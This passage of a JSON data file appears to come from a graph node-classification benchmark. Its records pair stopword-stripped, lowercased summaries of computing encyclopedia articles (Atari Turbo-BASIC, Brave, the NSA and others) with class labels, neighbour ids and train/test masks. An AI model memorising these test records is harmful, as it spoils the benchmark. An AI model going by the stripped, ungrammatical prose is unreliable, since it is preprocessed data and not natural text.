atari dos 2.0 number ports different versions dos available notable feature turbo-basic dramatically improved speed unmodified atari basic program loaded turbo-basic would normally run three five times faster would improve program size grew due largely series improvements well-known problems original atari basic code basics goto handled reading associated line number searching program line code simple improvement compare line number line found goto line number larger interpreter would search forward spot smaller would search start program ms basic included pointer next instruction previous atari basic lacked simple improvement searching code start every time ... next loops another common construct basic programs basics portion seen location source code pushed onto call stack could easily return associated next encountered atari basic lacked improvement instead looked entire code associated took considerable time programs significant looping often case basic could represent dramatic performance hit turbo-basic used address ms-basic went greatly improved goto performance well line numbers sent hash function broke 256-line chunks program entered address first chunks stored 256-value table runtime line number lookup needed would first pick nearest-but-lower value table retrieve address begin scanning line point improvement notable larger programs scanning time increasingly expensive turbo-basic could hit 5-times increase larger programs major source poor performance atari basic slow binary coded decimal bcd floating point code library contained separate 2k rom considered part operating system opposed basic written hurry never optimized routines notably multiply exponents far slower could turbo-basic fixed including complete floating point library fixed many issues also optimized code unrolling small loops programs used math extensively new library resulted dramatic performance improvements sending atari near bottom ahl benchmark lists near top beating number machines much faster hardware among extra features turbo-basic xl added atari basic following",
    "neighbors": [
      3718,
      7691,
      1805,
      9997,
      6289,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      1952,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      5040,
      7343,
      7983,
      11315,
      315,
      7355,
      7486,
      4160,
      4674,
      10750,
      712,
      847,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 7871,
    "label": 9,
    "text": "JavaScript_library:javascript library javascript library library pre-written javascript allows easier development javascript-based applications especially ajax web-centric technologies javascript first developed netscape later mozilla long presence web many websites gained particular pitch rise web 2.0 era computing javascript became increasingly used development user interfaces applications web-based desktop-based javascript also combined css create dynamic web pages also become popular efficient accessible alternative flash-based websites expanded demands javascript easier means programmers develop dynamic interfaces needed thus javascript libraries javascript widget libraries developed allowing developers concentrate upon distinctive applications ajax led companies groups microsoft yahoo developing javascript-based user interface libraries find way web applications developed companies javascript libraries allow easier integration javascript web development technologies css php ruby java many libraries include code detect differences runtime environments remove need applications allow inconsistencies almost javascript libraries released either copycenter copyleft license ensure license-free distribution usage modification javascript libraries angular classified frameworks since exhibit full-stack capabilities properties found general javascript libraries",
    "neighbors": [
      1409,
      259,
      8068,
      3462,
      5255,
      6791,
      1802,
      6154,
      10507,
      1295,
      8854,
      4378,
      8605,
      9245,
      7455,
      6176,
      8735,
      1698,
      803,
      1959,
      5031,
      5677,
      1713,
      3761,
      1203,
      11060,
      438,
      4920,
      1470,
      5311,
      2880,
      9152,
      8644,
      4171,
      5067,
      11087,
      339,
      84,
      4822,
      5846,
      4056,
      9560,
      9561,
      603,
      8923,
      8289,
      482,
      5219,
      7396,
      4198,
      487,
      5483,
      9195,
      5101,
      10991,
      10097,
      10739,
      2804,
      9844,
      119,
      10744,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 7872,
    "label": 2,
    "text": "The_Art_of_Unix_Programming:art unix programming art unix programming eric s. raymond book history culture unix programming earliest days 1969 2003 published covering genetic derivations bsd conceptual ones linux author utilizes comparative approach explaining unix contrasting operating systems including desktop-oriented ones microsoft windows classic mac os ones research roots eros plan 9 bell labs book published addison-wesley september 17 2003 also available online creative commons license additional clauses book contains many contributions quotations comments unix gurus past present include",
    "neighbors": [
      3206,
      6797,
      2581,
      3733,
      6304,
      9507,
      294,
      7983,
      823,
      1335,
      576,
      9926,
      8395,
      1360,
      9298,
      3923,
      4830,
      8031,
      3939,
      4333,
      5492,
      3062
    ],
    "mask": "None"
  },
  {
    "node_id": 7873,
    "label": 4,
    "text": "Proxy_list:proxy list proxy list list open http/https/socks proxy servers one website proxies allow users make indirect network connections computer network services proxy lists include ip addresses computers hosting open proxy servers meaning proxy servers available anyone internet proxy lists often organized various proxy protocols servers use many proxy lists index web proxies used without changing browser settings 3 types http proxies socks protocol relays tcp sessions firewall host allow application users transparent access across firewall protocol independent application protocols used many different services telnet ftp finger whois gopher www etc access control applied beginning tcp session thereafter server simply relays data client application server incurring minimum processing overhead since socks never know anything application protocol also easy accommodate applications use encryption protect traffic nosy snoopers information client sent server – thus need test anonymity level socks proxies",
    "neighbors": [
      5405,
      1692,
      4725,
      5591
    ],
    "mask": "Test"
  },
  {
    "node_id": 7874,
    "label": 7,
    "text": "Axcient:axcient axcient inc mountain view california company provides recovery-as-a-service raas businesses protect data applications axcient platform manages data backup data recovery disaster recovery regulatory compliance cloud storage online backup granular data recovery single web based service eliminate data loss small large businesses axcient founded 2006 headquartered mountain view california privately held backing investors including allegis capital peninsula ventures thomvest scale venture partners company name comes combining words intelligent access placed random word generator exchanged word intelligent synonym sapient flipped around access ax -sapient cient september 16 2014 axcient acquired directrestore dover delaware-based granular recovery technology solutions provider directrestore product portfolio enables restoration mainstream applications sql server microsoft exchange database backups replications axcient integrate single solution oem software.in july 2017 efolder merged axcient gartner rated axcient excellent critical capabilities recovery service report “ visionary ” gartner ’ magic quadrant draas axcient also ranked “ leader ” forrester disaster recovery service provider forrester wave “ leader ” idc marketscape draas vendor assessment service require software installed customers hardware axcient one product web-based cloud solution includes data backup data recovery disaster recovery regulatory compliance cloud storage online backup granular data application restore",
    "neighbors": [
      6514,
      6565,
      3366,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 7875,
    "label": 2,
    "text": "UpdateStar:updatestar updatestar freeware software application providing update information approximately 1.3 million software programs implementing social computing aspect update database maintained users updatestar uses advertising refinance free service shares ad revenue 50/50 software authors via share program software searched downloaded updated addition updatestar freeware client easily installed inform users available updates individual software setup allows downloading installing uninstalling programs within client acts enhancement add/remove programs control panel applet programs features windows vista software search engine http //www.updatestar.com/ built top updatestar ’ user generated software program database via ad revenue sharing program share updatestar allows developers use updatestar website download mirror participate ad revenue created program ’ webpages updatestar founded michael ganss frank alperstaedt olaf kehrer 2007 based berlin software search engine website however launch july 2008 company funded founders current version site released july 2008 included new software search capabilities results based user submitted information 259,000 programs new professional services business section updatestar freeware client section updatestar freeware grown popularity 50,000 users 2007 550,000 users july 2008 updatestar 4 released march 2009 introduced enhanced recognition algorithm registry cleaner removes remnants uninstalled software updates appear almost daily basis software setup 60 80 programs typical pc making nearly impossible pc user keep program available freeware well commercial premium edition additional security advice program cleaner system maintenance updatestar provides user information software updates available software computer includes major releases provided updatestar freeware edition well minor version upgrades patches included premium edition many updates published security reasons newly included features either way software updates considered important even critical case updates made available publishers security reasons updatestar premium additionally offers security advice allowing identification important software updates updatestar premium includes tool clean windows registry superfluous faulty software entries often result incompletely uninstalled software two million users profit updatestar service per month december 2009 receive updates pcs software updatestar provides users program update information 4.5 million installations daily updatestar released version 5 oct 19 2009 introducing improved version recognition improved windows 7 support new language support korean lithuanian improved translations russian hungarian romanian attempts download software updatestar site lead malware attacks updatestar uses software search engine website share ad revenue software authors professional services include software market research analytics well targeted marketing services connect software vendors allows updatestar provide update information service free user community updatestar website tracks created ad revenues program pages share program creates ppc based revenue streams users click ads program ’ download page updatestar web advertiser charged advertising fee split updatestar software vendor vendor participates share partner updatestar website ’ user traffic comes targeted alerts newly available updates used software offering information downloads traffic multiplies number updates users way share software vendor partners participate repeatedly revenue created content software long participate february 2010 updatestar began commercial online backup service called updatestar online backup users updatestar online backup select files folders desktop application periodically backed remote data center program employs differential backup algorithm minimize amount data needs backed subsequent runs updatestar offers plans unlimited storage home business desktop computers limited storage 100 gb 250 gb 500 gb server computers program runs windows xp windows vista windows 7 desktop edition windows server 2003 windows server 2008 server edition",
    "neighbors": [
      4074,
      5067,
      6797,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7876,
    "label": 9,
    "text": "Affix_grammar:affix grammar affix grammar kind formal grammar used describe syntax languages mainly computer languages using approach based natural language typically described grammatical rules affix grammar context-free grammar except certain parts nonterminals affixes used arguments affix occurs multiple times rule value must agree i.e must everywhere types affix grammar complex relationships affix values possible describe extremely simple fragment english following manner context-free grammar describes simple sentences nouns verbs rules introduce parts speech large range english sentences described promising approach describing syntax english however given grammar also describes sentences sentences wrong english subject verb grammatical number must agree affix grammar express directly grammar describes correct english sentences although could argued still incorrect instead read incorporated using affixes means describing relationships different affix values powerful enough remarked means depend type affix grammar chosen simplest type affix grammar affixes take values finite domain affix values related agreement example applied way affixes increase compactness grammars add expressive power another approach allow affixes take arbitrary strings values allow concatenations affixes used rules ranges allowable values affixes described context-free grammar rules produces formalism two-level grammars also known van wijngaarden grammars 2vw grammars successfully used describe complicated languages particular syntax algol 68 programming language however turns even though affix values manipulated string concatenation formalism turing complete hence even basic questions language described arbitrary 2vw grammar undecidable general extended affix grammars developed 1980s restricted version idea mainly applied describe grammar natural language e.g english another possibility allow values affixes computed code written programming language two basic approaches used",
    "neighbors": [
      1952,
      8262,
      1672,
      2316,
      3277,
      9871,
      7634,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 7877,
    "label": 2,
    "text": "Nokia_N96:nokia n96 nokia n96 high-end smartphone announced nokia february 11 2008 mobile world congress barcelona part nseries line n96 runs updated symbian os v9.3 s60 3rd edition fp2 compatible n-gage 2.0 gaming platform also dvb-h television tuner compared popular nokia n95 8gb n96 doubled flash storage capacity 16 gigabytes dual led flash camera slimmer design however critics negative views n96 battery life user-unfriendlyness downgraded cpu clock speed raised questions one 2008 anticipated mobile phones launch delayed widely available october 2008 thus considered commercial failure critics felt nokia n85 provided new additions compared n96 much cheaper shipments n96 started september 2008 europe middle east asia-pacific first locations provide handset consumers american chinese versions expected shortly thereafter u.s. device sold us 900 criticised expensive general uk release date n96 1 october although london separate date 24 september device went sale exclusively nokia flagship stores regent street terminal 5 heathrow airport additions negative",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      9262,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      10053,
      199,
      967,
      9292,
      11084,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      4569,
      5211,
      2524,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      3561,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 7878,
    "label": 8,
    "text": "List_of_web_service_specifications:list web service specifications variety specifications associated web services specifications varying degrees maturity maintained supported various standards bodies entities specifications basic web services framework established first-generation standards represented wsdl soap uddi specifications may complement overlap compete web service specifications occasionally referred collectively ws-* though single managed set specifications consistently refers recognized owning body across ws-* prefix used indicate specifications associated web services exist many ws-* standards including ws-addressing ws-discovery ws-federation ws-policy ws-security ws-trust page includes many specifications might considered part ws-* sites contain documents links different web services standards identified page specifications provide additional information improve interoperability vendor implementations",
    "neighbors": [
      8070,
      4107,
      6284,
      5782,
      7320,
      10396,
      5789,
      11040,
      10020,
      425,
      4397,
      431,
      6067,
      5303,
      317,
      6079,
      10949,
      9415,
      1097,
      10829,
      6353,
      6357,
      2013,
      6366,
      479,
      11105,
      489,
      5996,
      4974,
      4213,
      10486,
      6775,
      3839
    ],
    "mask": "Test"
  },
  {
    "node_id": 7879,
    "label": 3,
    "text": "Interruptible_operating_system:interruptible operating system interruptible operating system operating system ability handle multiple interrupts concurrently words allow interrupts interrupted concurrent interrupt handling essentially mean concurrent execution kernel code hence induces additional complexity concurrency control accessing kernel datastructures means system stop program already running feature nearly modern operating systems",
    "neighbors": [
      5457,
      9366,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 7880,
    "label": 9,
    "text": "Flavors_(programming_language):flavors programming language flavors early object-oriented extension lisp developed howard cannon mit artificial intelligence laboratory lisp machine programming language lisp machine lisp first programming language include mixins symbolics used lisp machines eventually developed new flavors original new flavors message passing oo models hugely influential development common lisp object system clos implementations flavors also available common lisp new flavors replaced message sending calling generic functions flavors offers daemons default method combination called flavors offers features found clos clos offers following features found flavors",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      1159,
      9865,
      9877,
      5803,
      2225,
      7867,
      4799,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      242,
      8435,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      5384,
      1301,
      10012,
      3869,
      2335,
      2849,
      8993,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      5519,
      6556,
      6047,
      1952,
      4516,
      5029,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      989,
      3051,
      5611,
      8173,
      7670,
      11255
    ],
    "mask": "Test"
  },
  {
    "node_id": 7881,
    "label": 2,
    "text": "Direct-access_storage_device:direct-access storage device direct-access storage device dasd pronounced secondary storage device physical record discrete location unique address ibm coined term dasd shorthand describing hard disk drives magnetic drums data cells later optical disc drives flash memory units also classified dasd term dasd contrasts sequential storage media magnetic tape unit record equipment card devices like card readers punches access methods dasd include sequential indexed direct direct access contrasts sequential access method used tape drives record dasd accessed without read intervening records current location whereas reading anything next record tape requires skipping intervening records requires proportionally long time access distant point medium dasd storage class includes fixed removable media ibm mainframes access i/o devices including dasd channels type subordinate mini-processor channel programs write read control given device operating system uses four byte relative track record ttr access methods others eight-byte extent-bin-cylinder-track-record block address mbbcchhr channel programs address dasd using six byte seek address bbcchh five byte record identifier cchhr 2321 data cell discontinued january 1975 addressing scheme device referred chr ctr cylinder-track-record bin number always 0 ibm refers data records programmers work logical records format disk blocks physical records one block might contain several logical user records schemes called spanned records partial logical records physical records size limit track devices track overflow feature allowed breaking large block track-size segments within cylinder access methods responsible blocking deblocking logical records written read external media ckd acronym count key data physical layout block dasd device confused ctr block address used channel program 1970s ibm introduced fixed block architecture fba mainframes programming level devices use traditional chr addressing reference fixed-length blocks number much like sectors mini-computers correctly application programmer remains unaware underlying storage arrangement stores data fixed physical block lengths 512 1024 2048 4096 depending device type applications fba offers simplicity increase throughput fba supported vm/370 dos/vse mvs successor operating systems os/360 line programming interface macros routines collectively referred dam direct access methods ibm 1964 first version ibm system/360 system summary used term file collectively described devices called dasd files provided random access storage time ibm product reference manual described devices direct access storage devices without acronym early public use acronym dasd ibm march 1966 manual data file handbook earliest non-ibm use acronym dasd found google ngram viewer refer storage devices dates 1968 use term grew exponentially drums data cells disappeared products dasd remains synonym disk flash optical devices modern dasd used mainframes rarely consist single disk-drives commonly dasd means large disk arrays utilizing raid schemes current devices emulate ckd fba hardware",
    "neighbors": [
      8290,
      868,
      663,
      6664,
      11673,
      7053,
      3323,
      8911,
      7217,
      6003,
      6515,
      4535,
      9977,
      2395
    ],
    "mask": "Test"
  },
  {
    "node_id": 7882,
    "label": 7,
    "text": "GStat:gstat gstat web application aimed displaying information grid services grid information system related metrics system designed modular way software reused different application scenarios gstat evolved past years simple cgi script displayed summary grid infrastructure production quality service providing rich features information content testing infrastructure monitoring evolutionary approach development enabled gstat add functionally response real use cases become key operational tool gstat 2.0 major redesign original version ensure meet future demands evolving infrastructure easily integrate operational tools gstat result collaboration academia sinica grid technology group cern main purpose joint project align gstat direction taken wlcg monitoring group respect operational tools addition ensure gstat make contribution middleware certification site validation gstat compatible version 1.3 grid laboratory uniform environment data model taking information existing berkeley database information index instances currently effort developing compatibility version 2.0 grid laboratory uniform environment data model initial version gstat designed developed min tsai current team members contacted grid information product team webpage gstat provides method visualize grid infrastructure operational perspective based information found grid information system even absence information system information existence grid services needs communicated existence grid services communication existence defines grid infrastructures one main concepts gstat 2.0 bootstrapped information system endpoint defines view grid infrastructure periodically takes snapshot information system maintains cache main entities found infrastructure provides basic structure visualization main entities cache also used configure monitoring framework monitors information system reports health various components information system composed along metrics performance resulting information information system monitoring thereof used produce various displays address specific use cases gstat architecture makes clear separation data infrastructure monitoring content validation visualization core data model used maintain snapshot information system cache main entities probes used monitor information system components validation checks used ensure information content correct visualization framework used displaying resulting data modular approach enables software reused application scenarios gstat uniquely positioned support modern day big data initiatives gstat architecture implemented using two main frameworks django nagios django open source web application framework written python follows model–view–controller architectural pattern django models used provide core data model system snapshot script takes snapshot information system uses django framework store information import-entities script extracts main entities sites services snapshot maintains cache entities addition certain attributes extracted snapshot stored rrd databases using gstat-update-rrd script nagios open source monitoring framework used gstat monitor information system components validate information content via use custom probes monitoring probes re-used nagios based monitoring tools also executed command line enables easily incorporated test suites django also leveraged visualization aspects gstat entity cache used provide main structure displays snapshot result testing used provide detailed information",
    "neighbors": [
      8554,
      1211,
      5956,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 7883,
    "label": 2,
    "text": "Lorinda_Cherry:lorinda cherry lorinda cherry computer programmer received masters computer science stevens institute technology 1969 joined bell labs 1972 assembly language programmer worked unix operating system several years cherry worked mathematical tools bc dc co-authored eqn brian kernighan work libplot inspired later gnu plotutils package also worked analyzing federalist papers compressing digital phone books non-mathematical work included dictionary unix spell checker bell labs writer workbench wwb writer workbench meant help students learn edit work feeling lot tools value education much pointing people learning write choices make choices ’ think writing task making choices per se get paper think ’ cast stone makes edit cherry also contributed plan 9 operating system cowrote typing documents unix system using –ms –mcs macros troff mike lesk unix tenth edition manual coded non-dictionary based spellchecker typo conceived bob morris lorinda cherry also worked lee mcmahon along morris collecting substantial corpus text studying statistically tools particularly uniq comm became staples work came remarkable typo spotted typing errors statistical inference cherry ’ work approximate parsing aho ’ fast pattern search turned right foundation english style-appraiser suggested prof. william vesterman rutgers turn elaborated writer workbench nina macdonald others human performance engineering department cherry one three co-inventors patent method system verifying status 911 emergency telephone services cherry raced rally cars hobby cherry always fascinated text processing",
    "neighbors": [
      1987,
      8522,
      9298,
      5492,
      310,
      477
    ],
    "mask": "Train"
  },
  {
    "node_id": 7884,
    "label": 2,
    "text": "C-list_(computer_security):c-list computer security capability-based computer security c-list array capabilities usually associated process maintained kernel program running process manipulate capabilities directly refers via c-list indexes—integers indexing c-list file descriptor table unix example c-list unix processes manipulate file descriptors directly refer via file descriptor numbers c-list indexes keykos eros operating systems process capability registers constitute c-list",
    "neighbors": [
      256,
      4034,
      7480,
      10146,
      10813,
      2951,
      4423,
      5503,
      5483,
      11596,
      10835,
      3700,
      5492,
      10614,
      728,
      8633,
      6813,
      3999
    ],
    "mask": "Test"
  },
  {
    "node_id": 7885,
    "label": 5,
    "text": "Brave_(web_browser):brave web browser brave free open-source web browser developed brave software inc. based chromium web browser browser blocks ads website trackers company proposed adopting pay-to-surf business model future version browser 2018 brave supports windows macos linux android ios current version features five search engines default including partner duckduckgo brave allows users support sites visit bat users may earn bat watching ads funding bat wallet users paid 70 revenue generate remaining 30 split brave advertisement publisher test version browser brave targets web ads analyzing user anonymized browsing history brave software basic attention token ad exchange platform received investment danhua capital digital currency group foundation capital founders fund huiyin blockchain venture pantera capital propel venture partners originally incorporated delaware hyperware labs inc 2015 later changed name brave software inc. registered california company headquartered brave developed brave software founded may 28 2015 ceo brendan eich cto brian bondy january 20 2016 brave software launched first version brave ad blocking feature announced plans privacy ad feature revenue sharing program june 2018 brave released pay-to-surf test version browser version brave preloaded approximately 250 ads sends detailed log user browsing activity brave short-term purpose testing functionality brave announced expanded trials follow later month brave added support tor desktop browser private browsing mode december year brave called boycott google advertising practices december 2018 brave ran fork electron called muon marketed secure fork nevertheless brave developers moved chromium citing need ease maintenance burden final muon-based version released intention would stop working instruct users update end life approached april 25 2019 brave team members released brave ads release version web browser also working vice media home chef ternio blockcard mycrypto etoro addition buysellads tap network airswap fluidity uphold pay users cryptocurrency viewing ads july brave ads also became available android app brave browser default browser upcoming cryptocurrency-focused htc exodus 1 telephone june 2019 brave started testing new ad-blocking rule matching algorithm implemented rust brave claims average 69 times faster previous implementation c++ new algorithm inspired ublock origin ghostery algorithms january 2016 reaction brave software initial announcement sebastian anthony ars technica described brave cash-grab double dip anthony concluded brave interesting idea generally rather frowned upon stick ads front someone else techcrunch computerworld engadget termed brave ad replacement plans controversial february 2016 andy patrizio network world reviewed pre-release version brave patrizio criticized browser feature set mighty primitive lauded performance pages load instantly ca n't really benchmark page loads since happen faster start/stop stopwatch april 2016 ceo newspaper association america david chavern said brave proposed replacement advertising viewed illegal deceptive courts consumers value creation content eich responded emphasizing browser gives lion share ad revenue content publishers april 2017 techworld praised brave great speeds advanced ad-tracking controls said extension functionality still lacking january 2019 zerocrypted praised ui new chrome extension support said rewards clear users similarly cnet said december review brave june 21 2019 technical columnist washington post geoffrey fowler recommending firefox listed brave among browser options available alternatives chrome article indicating abandonment browser 11,000 tracking cookies documented browser single week noted brave goes even trying jam ad-tech industry basic attention token bat open-source decentralized ad exchange platform based ethereum platform integrated brave web browser possible use access platform browser official description token provided via whitepaper brave payments formerly used bitcoin allows users tip websites content creators youtubers twitch streamers bat tokens akin patronage services patreon integration bat application involves implementing bat ads system displays ads users based locally stored data ad targeting performed locally removing need third-party tracking initial coin offering may 31 2017 bat sold 1,000,000,000 bat total 156,250 ethereum us 35m less 30 seconds additional 500,000,000 bat retained team developer user growth pools used promote adoption platform additionally received least us 7 million angel investments venture capital firms including peter thiel founders fund propel venture partners pantera capital foundation capital digital currency group early december 2017 development team disbursed first round user growth pool grants total 300,000 bat distributed new users first come first served basis mid january 2018 team issued us 1m worth bat tokens users promotional giveaway grants claimed within ten days march 1 2018 company expanded brave payments support streamers twitch.tv platform increased referral program grants us 1m worth bat april 24 2019 brave implemented bat ads program pays users bat viewing advertisements compensation attention users get 70 revenue attention generates deposited brave wallet monthly notable publishers accept bat tokens include washington post guardian npr la times vimeo marketwatch barron duckduckgo qwant bittorrent slate vice",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      1087,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      2182,
      6791,
      6797,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7364,
      5319,
      11466,
      7885,
      11469,
      9424,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      8443,
      9987,
      7943,
      1807,
      278,
      3350,
      7965,
      1834,
      7983,
      823,
      10057,
      11082,
      2893,
      3428,
      11112,
      8557,
      6528,
      1409,
      3971,
      3462,
      8584,
      6028,
      7572,
      5536,
      5026,
      944,
      5054,
      6086,
      4048,
      11221,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7886,
    "label": 4,
    "text": "Ewido_Networks:ewido networks ewido networks software company based germany known creating ewido anti-spyware ewido anti-spyware software used remove malware spyware trojan horses adware dialers worms also featured real-time protection automatic updates privacy features ewido free version paid version added realtime protection automatic updates ewido networks founded germany 2004 andreas rudyk peter klapprodt tobias graf first product ewido security suite ewido given digital river ice award best newcomer year april 19 2006 announced czech grisoft acquired german anti-malware company ewido networks birth grisoft avg anti spyware anti spyware based ewido engine grisoft includes ewido many security suites bundles antivirus products software began life ewido security suite name changed ewido anti-malware december 2005 release 4.0 later changed ewido anti-spyware ewido anti-spyware included new features scheduled scans file shredder running process manager new interface also included lsp bho viewer free version realtime protection automatic updates users could update manually last known price 29.99 grisoft acquisition however ewido anti-spyware development stopped continues exist ewido online scanner ewido micro scanner using full ewido engine signatures without excluding heuristic detection options avg 8.0 avg anti-spyware integrated avg anti-virus longer available standalone product means avg anti-spyware longer receive updates ewido works many popular antivirus spyware products",
    "neighbors": [
      704,
      2049,
      7362,
      10756,
      4677,
      550,
      877,
      4403,
      6643,
      2005,
      10392,
      2041,
      1242,
      7515,
      9055
    ],
    "mask": "None"
  },
  {
    "node_id": 7887,
    "label": 4,
    "text": "National_Security_Agency:national security agency national security agency nsa national-level intelligence agency united states department defense authority director national intelligence nsa responsible global monitoring collection processing information data foreign domestic intelligence counterintelligence purposes specializing discipline known signals intelligence sigint nsa also tasked protection u.s. communications networks information systems nsa relies variety measures accomplish mission majority clandestine originating unit decipher coded communications world war ii officially formed nsa president harry s. truman 1952 since become largest u.s. intelligence organizations terms personnel budget nsa currently conducts worldwide mass data collection known physically bug electronic systems one method end nsa also alleged behind attack software stuxnet severely damaged iran nuclear program nsa alongside central intelligence agency cia maintains physical presence many countries across globe cia/nsa joint special collection service highly classified intelligence team inserts eavesdropping devices high value targets presidential palaces embassies scs collection tactics allegedly encompass close surveillance burglary wiretapping breaking entering unlike cia defense intelligence agency dia specialize primarily foreign human espionage nsa publicly conduct human-source intelligence gathering nsa entrusted providing assistance coordination sigint elements government organizations – prevented law engaging activities part responsibilities agency co-located organization called central security service css facilitates cooperation nsa u.s. defense cryptanalysis components ensure streamlined communication signals intelligence community divisions nsa director simultaneously serves commander united states cyber command chief central security service nsa actions matter political controversy several occasions including spying anti-vietnam-war leaders agency participation economic espionage 2013 nsa many secret surveillance programs revealed public edward snowden former nsa contractor according leaked documents nsa intercepts stores communications billion people worldwide including united states citizens documents also revealed nsa tracks hundreds millions people movements using cellphones metadata internationally research pointed nsa ability surveil domestic internet traffic foreign countries boomerang routing origins national security agency traced back april 28 1917 three weeks u.s. congress declared war germany world war code cipher decryption unit established cable telegraph section also known cipher bureau headquartered washington d.c. part war effort executive branch without direct congressional authorization course war relocated army organizational chart several times july 5 1917 herbert o. yardley assigned head unit point unit consisted yardley two civilian clerks absorbed navy cryptanalysis functions july 1918 world war ended november 11 1918 army cryptographic section military intelligence mi-8 moved new york city may 20 1919 continued intelligence activities code compilation company direction yardley disbandment u.s. army cryptographic section military intelligence known mi-8 1919 u.s. government created cipher bureau also known black chamber black chamber united states first peacetime cryptanalytic organization jointly funded army state department cipher bureau disguised new york city commercial code company actually produced sold codes business use true mission however break communications chiefly diplomatic nations notable known success washington naval conference aided american negotiators considerably providing decrypted traffic many conference delegations notably japanese black chamber successfully persuaded western union largest u.s. telegram company time well several communications companies illegally give black chamber access cable traffic foreign embassies consulates soon companies publicly discontinued collaboration despite chamber initial successes shut 1929 u.s. secretary state henry l. stimson defended decision stating gentlemen read mail world war ii signal intelligence service sis created intercept decipher communications axis powers war ended sis reorganized army security agency asa placed leadership director military intelligence may 20 1949 cryptologic activities centralized national organization called armed forces security agency afsa organization originally established within u.s. department defense command joint chiefs staff afsa tasked direct department defense communications electronic intelligence activities except u.s. military intelligence units however afsa unable centralize communications intelligence failed coordinate civilian agencies shared interests department state central intelligence agency cia federal bureau investigation fbi december 1951 president harry s. truman ordered panel investigate afsa failed achieve goals results investigation led improvements redesignation national security agency agency formally established truman memorandum october 24 1952 revised national security council intelligence directive nscid 9 since president truman memo classified document existence nsa known public time due ultra-secrecy u.s. intelligence community referred nsa agency 1960s nsa played key role expanding u.s. commitment vietnam war providing evidence north vietnamese attack american destroyer gulf tonkin incident secret operation code-named minaret set nsa monitor phone communications senators frank church howard baker well major civil rights leaders including martin luther king jr. prominent u.s. journalists athletes criticized vietnam war however project turned controversial internal review nsa concluded minaret program disreputable outright illegal nsa mounted major effort secure tactical communications among u.s. forces war mixed success nestor family compatible secure voice systems developed widely deployed vietnam war 30,000 nestor sets produced however variety technical operational problems limited use allowing north vietnamese exploit intercept u.s. communications aftermath watergate scandal congressional hearing 1975 led senator frank church revealed nsa collaboration britain sigint intelligence agency government communications headquarters gchq routinely intercepted international communications prominent anti-vietnam war leaders jane fonda dr. benjamin spock agency tracked individuals secret filing system destroyed 1974 following resignation president richard nixon several investigations suspected misuse fbi cia nsa facilities senator frank church uncovered previously unknown activity cia plot ordered administration president john f. kennedy assassinate fidel castro investigation also uncovered nsa wiretaps targeted u.s. citizens church committee hearings foreign intelligence surveillance act 1978 passed law designed limit practice mass surveillance united states 1986 nsa intercepted communications libyan government immediate aftermath berlin discotheque bombing white house asserted nsa interception provided irrefutable evidence libya behind bombing u.s. president ronald reagan cited justification 1986 united states bombing libya 1999 multi-year investigation european parliament highlighted nsa role economic espionage report entitled 'development surveillance technology risk abuse economic information year nsa founded nsa hall honor memorial national cryptologic museum fort meade maryland memorial tribute pioneers heroes made significant long-lasting contributions american cryptology nsa employees must retired fifteen years qualify memorial nsa infrastructure deteriorated 1990s defense budget cuts resulted maintenance deferrals january 24 2000 nsa headquarters suffered total network outage three days caused overloaded network incoming traffic successfully stored agency servers could directed processed agency carried emergency repairs cost 3 million get system running incoming traffic also directed instead britain gchq time director michael hayden called outage wake-up call need invest agency infrastructure 1990s defensive arm nsa – information assurance directorate iad – started working openly first public technical talk nsa scientist major cryptography conference j. solinas presentation efficient elliptic curve cryptography algorithms crypto 1997 iad cooperative approach academia industry culminated support transparent process replacing outdated data encryption standard des advanced encryption standard aes cybersecurity policy expert susan landau attributes nsa harmonious collaboration industry academia selection aes 2000 — agency support choice strong encryption algorithm designed europeans rather americans — brian snow technical director iad represented nsa cochairman technical working group aes competition michael jacobs headed iad time terrorist attacks september 11 2001 nsa believed public support dramatic expansion surveillance activities according neal koblitz alfred menezes period nsa trusted partner academia industry development cryptographic standards started come end part change nsa post-september 11 era snow replaced technical director jacobs retired iad could longer effectively oppose proposed actions offensive arm nsa 